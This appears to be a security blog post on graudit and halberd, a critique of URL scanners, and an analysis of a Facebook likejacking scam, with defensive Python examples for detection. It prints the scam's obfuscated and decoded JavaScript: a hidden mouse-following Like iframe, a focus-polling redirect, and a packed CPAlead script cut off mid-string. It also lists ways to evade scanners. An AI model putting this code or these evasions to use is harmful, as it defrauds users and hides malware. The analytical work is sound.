It is time for another graudit release, and this time it includes some big changes.
  • New PHP signatures
  • Improved C signatures for fewer false positives
  • Improved dotnet signatures
  • Whitespace neutrality for all signatures
  • -l option lists the available signature databases
  • -x option for excluding files
  • configure script added to the build chain
  • Makefile install targets changed; install is now system-wide
Package maintainers should take note of the last change. The Makefile still supports the old-style home directory install (make user install), but that is deprecated and will be dropped, since ./configure --prefix /home/user/bin --dbdir /home/user/.graudit; make install does the same thing.
I have also added some scripts from my talks; you can find them in the aux directory. There are no install rules for them, so they are only available from within the graudit-1.7_src tarball. My thanks to the people who contributed patches and bug reports; keep them coming.

You can download the latest version from the graudit download page.
[screenshot: halberd-ss.png]
Like most of my favourite tools, halberd does one thing and does it well: it tries to detect the individual servers behind a load balancer by sending many requests to the same host and comparing the responses. The idea is not new, but this is the best put-together tool I have used for it. It even handles multiple A records right off the bat. It is a little short on documentation and the error messages could be better, but it's still a great reconnaissance/testing tool for pen testers and system administrators alike.
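The core of what a halberd-style probe does, as an added example that is not halberd's own code: send the same request many times, fingerprint each response on header fields a load balancer does not normalise (stable headers and their order, cookie names, the backend's clock skew), and count the distinct fingerprints. The responses below are constructed by hand (two Apache boxes with different clocks and ETags, one nginx box) so the block runs offline; a real probe would collect them with repeated HTTP requests spread over some seconds.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime

# Header fields that legitimately change between responses from the same server,
# or are rewritten by the balancer, and therefore carry no signal.
VOLATILE = {"date", "content-length", "connection", "keep-alive", "expires", "age"}


def fingerprint(headers, received_at):
    """Reduce one response (list of (name, value) pairs) to a hashable signature.

    Signal used: the stable headers with their values and order (Server, ETag,
    X-Powered-By and friends), the names of cookies the response sets, and the
    clock skew between the Date header and our receive time, rounded to 2 s.
    Two real servers rarely share the same clock error, ETag seed and ordering.
    """
    lower = [(k.lower(), v) for k, v in headers]
    stable = tuple((k, v) for k, v in lower if k not in VOLATILE and k != "set-cookie")
    cookie_names = tuple(sorted(v.split("=", 1)[0].strip() for k, v in lower if k == "set-cookie"))
    skew = None
    for k, v in lower:
        if k == "date":
            skew = round((parsedate_to_datetime(v) - received_at).total_seconds() / 2) * 2
    return stable, cookie_names, skew


def cluster_backends(responses):
    """Group (headers, received_at) samples by fingerprint; one group per probable backend."""
    groups = defaultdict(int)
    for headers, received_at in responses:
        groups[fingerprint(headers, received_at)] += 1
    return dict(groups)


def summarize(groups):
    """One line per detected backend, most-hit first."""
    lines = []
    for (stable, cookies, skew), hits in sorted(groups.items(), key=lambda kv: -kv[1]):
        server = dict(stable).get("server", "?")
        skew_txt = f"{skew:+d}s" if skew is not None else "n/a"
        lines.append(f"{hits:3d} hits  server={server}  clock skew={skew_txt}  cookies={','.join(cookies) or '-'}")
    return lines


# ---- constructed sample data (not captured from any real host) ----
T0 = datetime(2010, 9, 1, 12, 0, 0, tzinfo=timezone.utc)


def constructed_response(received_at, server, clock_skew_s, extra):
    """Build one sample: the backend's Date header reflects its own (skewed) clock."""
    date = format_datetime(received_at + timedelta(seconds=clock_skew_s), usegmt=True)
    return [("Server", server), ("Date", date)] + extra, received_at


BACKENDS = [  # what three real servers behind one VIP might look like
    ("Apache/2.2.3 (CentOS)", 0, [("ETag", '"1a2b-4c-48d1"'), ("X-Powered-By", "PHP/5.2.6")]),
    ("Apache/2.2.3 (CentOS)", 37, [("ETag", '"1a2b-4c-48f9"'), ("X-Powered-By", "PHP/5.2.6")]),
    ("nginx/0.7.67", -3, [("Set-Cookie", "BALANCEID=balancer.node3; path=/")]),
]
# Round-robin balancing: 12 requests, one every 7 seconds.
SAMPLE_RESPONSES = [
    constructed_response(T0 + timedelta(seconds=7 * i), *BACKENDS[i % 3]) for i in range(12)
]

if __name__ == "__main__":
    for line in summarize(cluster_backends(SAMPLE_RESPONSES)):
        print(line)
```

The clock-skew rounding is deliberately coarse: network jitter of a few hundred milliseconds must not split one backend into two, while a 37-second clock error between two otherwise identical Apache boxes is a reliable tell.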

Grab your copy today from http://halberd.superadditive.com/

As promised, I have uploaded the slides and the corresponding advisory for my graudit talk at the Ruxcon meetup this month.

URL scanning seems to be an emerging trend. Detecting malware distribution channels and preventing infections is easier than cleaning up the mess they make. The basis of the idea is good, but the current implementations. I have been mulling this over for a while, ever since I read Russ McRae's post (rant?) on URL shorteners needing to detect malware.

The initial problems that URL scanners face are simple evasion techniques, such as the click-to-get-infected method that you can see in my previous post. This blogspot URL scores clean:
[screenshot: urlscanner-cleanly.jpg]
And why shouldn't it? It doesn't contain anything directly malicious, so it should score clean until reputation or reactive defenses catch up with it. Listen, you say, who cares about the herding page? It doesn't do anything; it's the delivery page we care about. If a user visits a "benign" page that redirects him to malware, he will still be stopped at the malicious page!

Alas, dear friend, a simple server-side block (here, of the scanner's source IP) is all it takes to stop http://scanner.novirusthanks.org from ever fetching the offending page (http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html).
[screenshot: av-ip-ban-avoidance.jpg]
Other documented techniques seen in the wild include delivering the malicious payload on only one in every x requests, user-agent filtering, JavaScript obfuscation that breaks automated deobfuscation, and more. I have seen an alert box break browser automation, so there is no shortage of options for the bad guys. However, considering how simple it is to shut down today's URL scanners, I doubt we will see many advanced techniques yet. URL scanning might overcome these simple bypasses in the future, but it should not be considered a defense on its own, and certainly not a replacement for your desktop AV.
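A differential fetch that makes the evasions just listed visible (scanner IP ban, user-agent filtering, payload on only one in every N requests), as an added example that is not from this post or from any scanner vendor: fetch the same URL under several request profiles and several times each, then compare what came back. `fetch(url, profile)` is an assumed callable returning (status, body); `make_constructed_site()` is a stand-in that behaves like the page described above, so nothing is fetched from the network.

```python
import hashlib
from collections import Counter, defaultdict

# Constructed profiles: a scanner with a fixed, well-known source IP and a
# non-browser user agent, versus an ordinary browser. IPs are RFC 5737
# documentation addresses.
PROFILES = {
    "scanner": {"ip": "203.0.113.10", "ua": "novirusthanks-url-scanner/1.0"},
    "browser": {"ip": "198.51.100.7", "ua": "Mozilla/5.0 (Windows NT 6.1) Gecko/20100722 Firefox/3.6.8"},
}


def differential_scan(url, fetch, profiles=PROFILES, repeats=4):
    """Fetch `url` `repeats` times under each profile; return {profile: Counter(digest)}."""
    seen = defaultdict(Counter)
    for name, profile in profiles.items():
        for _ in range(repeats):
            status, body = fetch(url, profile)
            digest = f"{status}:{hashlib.sha256(body.encode()).hexdigest()[:12]}"
            seen[name][digest] += 1
    return dict(seen)


def findings(seen, reference="browser", scanner="scanner"):
    """Turn the digests into the two facts a single-shot scan cannot see."""
    out = []
    for name, digests in seen.items():
        if len(digests) > 1:
            out.append(f"{name}: {len(digests)} distinct responses across repeats (intermittent delivery)")
    s, r = seen.get(scanner), seen.get(reference)
    if s and r and set(s).isdisjoint(r):
        out.append(f"{scanner} never saw what {reference} saw (cloaking: IP ban or user-agent filter)")
    return out


def make_constructed_site(banned_ips=("203.0.113.10",), every=3):
    """Constructed stand-in for the malicious site: 403s the scanner's IP, serves a
    benign page to non-browser user agents, and hands out the payload only on
    every `every`-th browser request."""
    hits = Counter()

    def fetch(url, profile):
        if profile["ip"] in banned_ips:
            return 403, "Forbidden"
        if "Mozilla" not in profile["ua"]:
            return 200, "<html><body>nothing to see</body></html>"
        hits[url] += 1
        if hits[url] % every == 0:
            return 200, "<html><script src='top.js'></script><script src='bottom.js'></script></html>"
        return 200, "<html><body>nothing to see</body></html>"

    return fetch


if __name__ == "__main__":
    seen = differential_scan("http://example.invalid/page.html", make_constructed_site())
    for line in findings(seen):
        print(line)
```

The point is not that the scanner can now see the payload (it still gets a 403) but that it can tell it is being treated differently from a browser, which is itself a strong signal. A scanner that only ever fetches once, from one IP, with one user agent, cannot even notice that.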

[image: rabbithole.png]
Today I noticed this one in my Facebook feed and thought: that's different! It's been a while since I chased a rabbit, so down the rabbit hole I went.
~$ GET http://craziestattoos.blogspot.com/

<meta property="og:title" content="The Guy With The Largest Dick On The Planet">
<meta property="og:type" content="article">
<meta property="og:url" content="http://craziestattoos.blogspot.com/"><link rel="me" href="http://www.blogger.com/profile/09319063164064567908">
<link rel="openid.server" href="http://www.blogger.com/openid-server.g">
<!-- --><style type="text/css">@import url(http://www.blogger.com/static/v1/v-css/navbar/697174003-classic.css);
div.b-mobile {display:none;}
</style>

<script type="text/javascript">
    function setAttributeOnload(object, attribute, val) {
      if(window.addEventListener) {
        window.addEventListener("load",
          function(){ object[attribute] = val; }, false);
      } else {
        window.attachEvent('onload', function(){ object[attribute] = val; });
      }
    }
  </script>
<iframe src="http://www.blogger.com/navbar.g?targetBlogID=6834350941604690306&blogName=The+Guy+With+The+Largest+Dick+On+The+...&publishMode=PUBLISH_MODE_BLOGSPOT&navbarType=BLUE&layoutType=CLASSIC&searchRoot=http%3A%2F%2Fcraziestattoos.blogspot.com%2Fsearch&blogLocale=nl&homepageUrl=http%3A%2F%2Fcraziestattoos.blogspot.com%2F" marginwidth="0" marginheight="0" id="navbar-iframe" allowtransparency="true" title="Blogger Navigation and Search" frameborder="0" height="30" scrolling="no" width="100%"></iframe>
<div></div>
<center><a href="http://access.im/1/AzO93"><img src="http://i46.tinypic.com/33ygjk6.jpg" /></a></center>
<script type="text/javascript" src="http://www.blogger.com/static/v1/common/js/4161557039-csitail.js"></script>
<script type="text/javascript">BLOG_initCsi('classic_blogspot');</script></body>
The blogspot page delivers an access.im link, shown as a "skip this ad page" image, that redirects to http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html when you click on it. Let's head further down the burrow:
~$ GET http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html
<head>
<title>The Guy With The Largest Dick On The Planet</title>
<script src="jquery.js" type="text/javascript"></script>
<script src="top.js" type="text/javascript"></script>
</head>
<body> 
<script type="text/javascript">
$(document).ready(function() {									
	$("a[name^='faq-']").each(function() {
		$(this).click(function() {
			if( $("#" + this.name).is(':hidden') ) {
				$("#" + this.name).fadeIn('normal');
                                $("a[name^='faq-']").hide('normal');
			} else {
				$("#" + this.name).fadeOut('normal');
			}			
			return false;
		});
	});
});
</script>

<style type="text/css">
.faq-answer {
display:none;
}
</style>
<center><img src="18.png" /></center>
<center><div class="faq-answer" id="faq-1"><img src="pre.jpg"></div></center>
<script src="bottom.js" type="text/javascript"></script>  
</body>
Looks pretty normal, right? I took a look at jquery.js and at a cursory glance it looks authentic, but then top.js delivers the first rabbit droppings:
~$ GET http://allhqpics.com/top.js
<!--
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%76%61%72%20%69%6E%74%65%72%76%61%6C%3B%0A%20%20%20%20%20%20%20%20%24%28%66%75%6E%63%74%69%6F%6E%28%29%0A%7B%0A%20%20%20%20%69%6E%74%65%72%76%61%6C%3D%73%65%74%49%6E%74%65%72%76%61%6C%28%22%75%70%64%61%74%65%41%63%74%69%76%65%45%6C%65%6D%65%6E%74%28%29%3B%22%2C%20%35%30%30%29%3B%0A%7D%29%3B%0A%0A%66%75%6E%63%74%69%6F%6E%20%75%70%64%61%74%65%41%63%74%69%76%65%45%6C%65%6D%65%6E%74%28%29%0A%7B%0A%20%20%20%20%69%66%20%28%20%24%28%64%6F%63%75%6D%65%6E%74%2E%61%63%74%69%76%65%45%6C%65%6D%65%6E%74%29%2E%61%74%74%72%28%27%69%64%27%29%3D%3D%22%66%62%66%72%61%6D%65%22%20%29%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%63%6C%65%61%72%49%6E%74%65%72%76%61%6C%28%69%6E%74%65%72%76%61%6C%29%3B%0A%20%20%20%20%20%20%20%20%69%66%6C%61%67%3D%31%3B%0A%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%61%6C%6C%68%71%70%69%63%73%2E%63%6F%6D%2F%74%68%65%2D%67%75%79%2D%77%69%74%68%2D%74%68%65%2D%6C%61%72%67%65%73%74%2D%64%69%63%6B%2D%6F%6E%2D%74%68%65%2D%70%6C%61%6E%65%74%2D%32%2E%68%74%6D%6C%22%3B%20%0A%20%20%20%20%7D%20%20%20%20%0A%7D%20%20%0A%20%20%20%20%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0A'));
//-->
Decoding that string gives us:
<script type="text/javascript">
var interval;
        $(function()
{
    interval=setInterval("updateActiveElement();", 500);
});

function updateActiveElement()
{
    if ( $(document.activeElement).attr('id')=="fbframe" ) 
    {
        clearInterval(interval);
        iflag=1;
        document.location="http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html"; 
    }    
}  
        </script>
The decoded script polls document.activeElement twice a second, and once the element with focus is an iframe with id fbframe (which we have not seen yet), it clears the timer, sets iflag and sends the browser to the -2 page. I'll get back to the second html page in a bit; first let's check bottom.js from the first page:
~$ GET http://allhqpics.com/bottom.js
<!--
document.write(unescape('%3C%64%69%76%20%73%74%79%6C%65%3D%22%6F%76%65%72%66%6C%6F%77%3A%20%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%20%31%30%70%78%3B%20%68%65%69%67%68%74%3A%20%31%32%70%78%3B%20%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%20%66%69%6C%74%65%72%3A%61%6C%70%68%61%28%6F%70%61%63%69%74%79%3D%30%29%3B%20%2D%6D%6F%7A%2D%6F%70%61%63%69%74%79%3A%30%2E%30%3B%20%2D%6B%68%74%6D%6C%2D%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%20%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%22%20%69%64%3D%22%69%63%6F%6E%74%61%69%6E%65%72%22%3E%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%70%6C%75%67%69%6E%73%2F%6C%69%6B%65%2E%70%68%70%3F%68%72%65%66%3D%68%74%74%70%3A%2F%2F%66%75%6E%6E%79%2D%63%65%6C%65%62%2D%70%69%63%73%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%26%61%6D%70%3B%6C%61%79%6F%75%74%3D%73%74%61%6E%64%61%72%64%26%61%6D%70%3B%73%68%6F%77%5F%66%61%63%65%73%3D%66%61%6C%73%65%26%61%6D%70%3B%77%69%64%74%68%3D%34%35%30%26%61%6D%70%3B%61%63%74%69%6F%6E%3D%6C%69%6B%65%26%61%6D%70%3B%66%6F%6E%74%3D%74%61%68%6F%6D%61%26%61%6D%70%3B%63%6F%6C%6F%72%73%63%68%65%6D%65%3D%6C%69%67%68%74%26%61%6D%70%3B%68%65%69%67%68%74%3D%38%30%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%73%74%79%6C%65%3D%22%62%6F%72%64%65%72%3A%6E%6F%6E%65%3B%20%6F%76%65%72%66%6C%6F%77%3A%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%35%30%70%78%3B%20%68%65%69%67%68%74%3A%32%33%70%78%3B%22%20%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3D%22%74%72%75%65%22%20%69%64%3D%22%66%62%66%72%61%6D%65%22%20%6E%61%6D%65%3D%22%66%62%66%72%61%6D%65%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%3C%2F%64%69%76%3E%0A%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%76%61%72%20%69%66%6C%61%67%20%3D%20%30%3B%0A%20%20%20%20%76%61%72%20%69%63%6F%6E%74%61%69%6E%65%72%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%69%63%6F%6E%74%61%69%6E%65%72%27%29%3B%20%20%20%20%0A%20%20%20%20%76%61%72%20%
73%74%61%6E%64%61%72%64%62%6F%64%79%3D%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6D%70%61%74%4D%6F%64%65%3D%3D%22%43%53%53%31%43%6F%6D%70%61%74%22%29%3F%20%64%6F%63%75%6D%65%6E%74%2E%64%6F%63%75%6D%65%6E%74%45%6C%65%6D%65%6E%74%20%3A%20%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%20%2F%2F%63%72%65%61%74%65%20%72%65%66%65%72%65%6E%63%65%20%74%6F%20%63%6F%6D%6D%6F%6E%20%22%62%6F%64%79%22%20%61%63%72%6F%73%73%20%64%6F%63%74%79%70%65%73%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%7B%0A%20%20%20%20%20%20%20%20%2F%2A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%44%4F%20%4E%4F%54%20%45%44%49%54%20%54%48%49%53%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2A%2F%0A%20%20%20%20%69%66%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%29%20%0A%20%20%20%20%7B%20%2F%2F%20%66%6F%72%20%49%45%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%79%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%54%6F%70%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%78%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%4C%65%66%74%2B%27%70%78%27%3B%0A%20%20%20%20%7D%20%0A%20%20%20%20%65%6C%73%65%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%65%2E%70%61%67%65%59%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%65%2E%70%61%67%65%58%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20%7D%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%6F%6E%6D%6F%75%73%65%6D%6F%76%65%20%3D%20%66%75%6E%63%74%69%6F%6E%28%65%29%20%7B%0A%20%20%20%20%20%20%20%20%69%66%20%28%69%66%6C%61%67%20%3D%3D%20%30%29%20%7B%6D%6F%75%73
%65%46%6F%6C%6C%6F%77%65%72%28%65%29%3B%7D%0A%20%20%20%20%20%20%20%20%65%6C%73%65%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%27%6E%6F%6E%65%27%3B%20%7D%0A%20%20%20%20%7D%0A%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E'));
//-->
Which decodes to:
<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
<iframe src="http://www.facebook.com/plugins/like.php?href=http://funny-celeb-pics.blogspot.com/&layout=standard&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
</div>
<script>
    var iflag = 0;
    var icontainer = document.getElementById('icontainer');    
    var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
    
    
    
    function mouseFollower(e){
        /*                    DO NOT EDIT THIS                         */
    if (window.event) 
    { // for IE
        icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
        icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
    } 
    else 
    {
        icontainer.style.top = (e.pageY-5)+'px';
        icontainer.style.left = (e.pageX-5)+'px';
    }

    }
    document.onmousemove = function(e) {
        if (iflag == 0) {mouseFollower(e);}
        else
        {
        icontainer.style.display = 'none'; }
    }

    </script>
This gets a little more interesting. bottom.js plants a 10 by 12 pixel, zero-opacity div holding a Facebook Like iframe for funny-celeb-pics.blogspot.com and moves that div under the mouse pointer on every mousemove event, so the victim's click on the "skip this ad" image actually lands on the Like button. Strictly speaking that is likejacking (clickjacking against the Like button) rather than CSRF: the request to Facebook is a real click inside Facebook's own frame, carrying the victim's session cookies, which is why Facebook's CSRF tokens do not help. The focus change into the iframe is exactly what top.js was polling for, so the victim likes the malicious site, luring more unsuspecting victims through their feeds, and is then redirected to the -2 page. It's time to pick up the pace and move on.
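A static check for the likejacking layout that bottom.js and top.js build above, as an added example that is not the page's own code: a Facebook Like iframe inside a zero-opacity container that is moved under the mouse pointer, plus a timer that watches document.activeElement and navigates away once a click has landed in that iframe. The HTML and script fragments embedded below are abridged from the decoded bottom.js and top.js on this page; the detection rules are this example's own heuristics, not a published signature.

```python
import re
from html.parser import HTMLParser

# opacity:0, opacity: 0.0, -moz-opacity:0.0, filter:alpha(opacity=0); but not 0.80
INVISIBLE = re.compile(r"opacity\s*[:=]\s*0(?:\.0+)?(?![.\d])", re.I)
LIKE_BUTTON = "facebook.com/plugins/like.php"


class FrameFinder(HTMLParser):
    """Record every <iframe> together with whether it or an ancestor is transparent."""

    def __init__(self):
        super().__init__()
        self.open = []      # (tag, attrs) of elements currently open
        self.frames = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "iframe":
            chain = self.open + [(tag, attrs)]
            self.frames.append({
                "id": attrs.get("id", ""),
                "src": attrs.get("src", ""),
                "transparent": any(INVISIBLE.search(a.get("style") or "") for _, a in chain),
            })
        self.open.append((tag, attrs))

    def handle_endtag(self, tag):
        for i in range(len(self.open) - 1, -1, -1):
            if self.open[i][0] == tag:
                del self.open[i:]
                break


def script_indicators(js):
    """Behavioural tells in page scripts, each reported separately."""
    found = []
    if re.search(r"onmousemove\s*=|['\"]mousemove['\"]", js):
        found.append("repositions an element on every mouse move")
    if "activeElement" in js and "setInterval(" in js:
        found.append("polls document.activeElement on a timer")
    if re.search(r"activeElement[\s\S]{0,400}?(?:document|window|top)\.location", js):
        found.append("navigates away once focus has entered a frame")
    return found


def likejacking_verdict(html, scripts):
    """Combine the layout check with the script tells; both are needed for a positive."""
    finder = FrameFinder()
    finder.feed(html)
    hidden_like = [f for f in finder.frames if f["transparent"] and LIKE_BUTTON in f["src"]]
    tells = [t for js in scripts for t in script_indicators(js)]
    return {
        "hidden_like_frames": hidden_like,
        "script_indicators": tells,
        "likely_likejacking": bool(hidden_like) and len(tells) >= 2,
    }


# Abridged from the decoded bottom.js above (markup part).
BOTTOM_JS_MARKUP = """<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; opacity: 0.0;" id="icontainer">
<iframe src="http://www.facebook.com/plugins/like.php?href=http://funny-celeb-pics.blogspot.com/&layout=standard&action=like" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
</div>"""
# Abridged from the decoded bottom.js (script part) and from top.js.
BOTTOM_JS_SCRIPT = """var iflag = 0; var icontainer = document.getElementById('icontainer');
function mouseFollower(e){ icontainer.style.top = (e.pageY-5)+'px'; icontainer.style.left = (e.pageX-5)+'px'; }
document.onmousemove = function(e) { if (iflag == 0) {mouseFollower(e);} else { icontainer.style.display = 'none'; } }"""
TOP_JS = """var interval; $(function(){ interval=setInterval("updateActiveElement();", 500); });
function updateActiveElement(){ if ( $(document.activeElement).attr('id')=="fbframe" ) { clearInterval(interval); iflag=1;
document.location="http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html"; } }"""
# Constructed control: the same Like button, embedded the way a legitimate blog does it.
HONEST_MARKUP = """<p>Like this post:</p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http://example.invalid/&layout=standard" style="border:none; width:450px; height:80px;"></iframe>"""

if __name__ == "__main__":
    print(likejacking_verdict(BOTTOM_JS_MARKUP, [BOTTOM_JS_SCRIPT, TOP_JS]))
    print(likejacking_verdict(HONEST_MARKUP, []))
```

Requiring both a transparent third-party frame and at least two script tells keeps an ordinary, visible Like button (the control input) out of the results. Because the markup here only exists after the unescape layer has been decoded, the check has to run on the deobfuscated output, not on the raw bottom.js.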
~$ GET http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html
<head>
<title>The Guy With The Largest Dick On The Planet</title>
<script src="jquery.js" type="text/javascript"></script>
<script type="text/javascript" src="http://www.cpalead.com/mygateway.php?pub=42138&gateid=OTM5ODQ%3D"></script>
</head>
<body> 
<script type="text/javascript">
$(document).ready(function() {									
	$("a[name^='faq-']").each(function() {
		$(this).click(function() {
			if( $("#" + this.name).is(':hidden') ) {
				$("#" + this.name).fadeIn('normal');
                                $("a[name^='faq-']").hide('normal');
			} else {
				$("#" + this.name).fadeOut('normal');
			}			
			return false;
		});
	});
});
</script>

<style type="text/css">
.faq-answer {
display:none;
}
<style>
<center><a href="#" name="faq-1"><img src="pre.jpg"></a></center>
<center></a><div class="faq-answer" id="faq-1"><a href="#" name="faq-1"><img src="hero.jpg"></div></center>  
</body>
And the reference to cpalead gives it away. That URL delivers your typical function(p,a,c,k,e,d) packed JavaScript (Dean Edwards' packer), which we decode using the Tom Liston method: swap the eval for a function that writes its argument into a textarea instead of executing it.
function showme(txt) {
	document.write("<textarea rows=50 cols=50>");document.write(txt); document.write("</textarea>"); 
}

//Copyright 2010 CPAlead.com

showme(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 124={"123":[{"13":"224=","18":"99","66":"0"},{"13":"200=","18":"50","66":"0"},{"13":"225=","18":"30","66":"0"},{"13":"222=","18":"95","66":"0"}]};9 76(7,189){90(6 65=0;65<124.123.97;65++){4(124.123[65].13==231(7)){153 124.123[65][189]}}}6 108=\'\';6 245=85;6 248=75;6 131=85;6 102=85;6 250=85;6 59=0;6 149=0;6 175=\'79\';6 249=\'242 246 230 228 227 62 239 240 243.\';9 251(113){6 133=19.128;4(247 19.128!=\'9\'){19.128=113}12{19.128=9(){4(133){241{133()}234(235){}}4(113){113()}}}}9 114(7){6 88=2.81("20").207(0);4(88==237){59=59+300;48("114(\'"+7+"\');",300)}12{199(7)}}9 226(7){4(108>0){59=59+108+\'155\';48("114(\'"+7+"\');",108+\'155\')}12{59=59+300;48("114(\'"+7+"\');",300)}}9 177(41){78=2.81(\'64\');90(8=0;8!=78.97;8++){4(78[8].13!=\'24\'){4(41==0){78[8].3.33=\'86\'}4(41==1){78[8].3.33=\'47\'}}}}9 140(41){6 211=2.81(\'236\');90(6 209=2.211,8=0,22;22=209[8];8++){4(22.13!=\'170\'&&22.13!=\'159\'){4(41==0){4(195.198==\'212 220 215\'){22.73(\'87\',\'25\');22.3.33=\'86\'}12{22.73(\'87\',\'25\');6 196=22.252,139=22.244;139.233(22);139.201(22,196)}}4(41==1){22.73(\'87\',\'19\');4(195.198==\'212 220 215\'){22.3.33=\'47\'}}}}}9 150(41){49=2.81(\'238\');90(8=0;8!=49.97;8++){4(49[8].13!=\'170\'&&49[8].13!=\'159\'){4(41==0){49[8].73(\'87\',\'25\');49[8].3.33=\'86\'}4(41==1){49[8].3.33=\'47\';49[8].73(\'87\',\'19\')}}}}9 96(){6 68,61;4(19.104&&19.184){68=19.176+19.223;61=19.104+19.184}12 4(2.20.183>2.20.60){68=2.20.232;61=2.20.183}12{68=2.20.229;61=2.20.60}6 14,58;4(137.104){14=2.74.98?2.74.98:137.176;58=137.104}12 4(2.74&&2.74.89){14=2.74.98;58=2.74.89}12 4(2.20){14=2.20.98;58=2.20.89}181=61<58?58:61;180=68<14?68:14;153 51=146 263(180,181,14,58)}9 141(){6 
